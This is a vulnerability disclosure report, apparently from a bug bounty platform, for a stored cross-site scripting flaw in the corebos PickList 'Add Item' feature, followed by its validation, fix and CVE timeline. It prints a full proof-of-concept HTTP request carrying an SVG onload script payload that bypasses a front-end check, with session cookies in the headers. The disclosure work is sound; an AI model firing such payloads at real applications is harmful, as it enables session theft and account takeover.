Cross-site Scripting (XSS) - Stored in tsolucio/corebos in tsolucio/corebos


Reported on

Apr 20th 2023


There is a taint path can store payload into the database. visit and click Add Item, the Add new entries here: can be tainted. Although there has a front limitation, but we can bypass it by modifying the request.

Proof of Concept

The tainted parameter is newValues. The PoC video is at

POST /corebos-master/index.php?action=PickListAjax&module=PickList&mode=add&file=PickListAction&fld_module=Accounts&fieldname=campaignrelstatus&newValues=%5B%22test<svg/onload=alert(/xsssssssssssssssssssss/);>test%22%5D&selectedRoles=%5B%22H2%22%2C%22H3%22%2C%22H4%22%2C%22H5%22%5D HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: text/plain;charset=UTF-8
Content-Length: 70
X-Requested-With: XMLHttpRequest
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Connection: close
Cookie: ck_login_id_vtiger=1; timezone=0; corebos_browsertabID=3817152672369736; phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D; phpbb2mysql_sid=966c2fe3f7855e8dd299fe17442437f7; phpbb2mysql_t=a%3A1%3A%7Bi%3A2%3Bi%3A1681955240%3B%7D; cb68ad0d4cc609476d862f5ee438ed70e0=pu80c91imrifdn10elmj65g0g6



This vulnerability has the potential to steal a user's cookie and gain unauthorized access to that user's account through the stolen cookie.

We are processing your report and will contact the tsolucio/corebos team within 24 hours. 5 months ago
We have contacted a member of the tsolucio/corebos team and are waiting to hear back 5 months ago
Joe Bordes validated this vulnerability 4 months ago
i0hex has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Joe Bordes marked this as fixed in 8 with commit 5e87fb 4 months ago
Joe Bordes has been awarded the fix bounty
This vulnerability has been assigned a CVE
Joe Bordes published this vulnerability 4 months ago
to join this conversation